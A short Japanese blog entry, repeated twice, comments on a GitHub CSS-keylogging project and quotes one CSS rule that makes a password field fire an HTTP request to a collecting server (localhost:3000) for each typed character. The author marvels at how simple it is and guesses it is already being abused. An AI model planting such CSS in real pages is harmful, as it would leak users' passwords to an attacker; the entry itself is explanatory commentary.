https://github.com/maxchehab/CSS-Keylogging
よくもまあこんなこと思いついたなw
要するに、
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
とすることで、キータイプ毎に特定のHTTPリクエストを発生させて、それをサーバ側でキャプチャするわけです。極めて簡単。
これはもう既に悪用されているでしょうなあ…
この日記は私的なものであり所属会社の見解とは無関係です。 GitHub: takahashikzn
https://github.com/maxchehab/CSS-Keylogging
よくもまあこんなこと思いついたなw
要するに、
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
とすることで、キータイプ毎に特定のHTTPリクエストを発生させて、それをサーバ側でキャプチャするわけです。極めて簡単。
これはもう既に悪用されているでしょうなあ…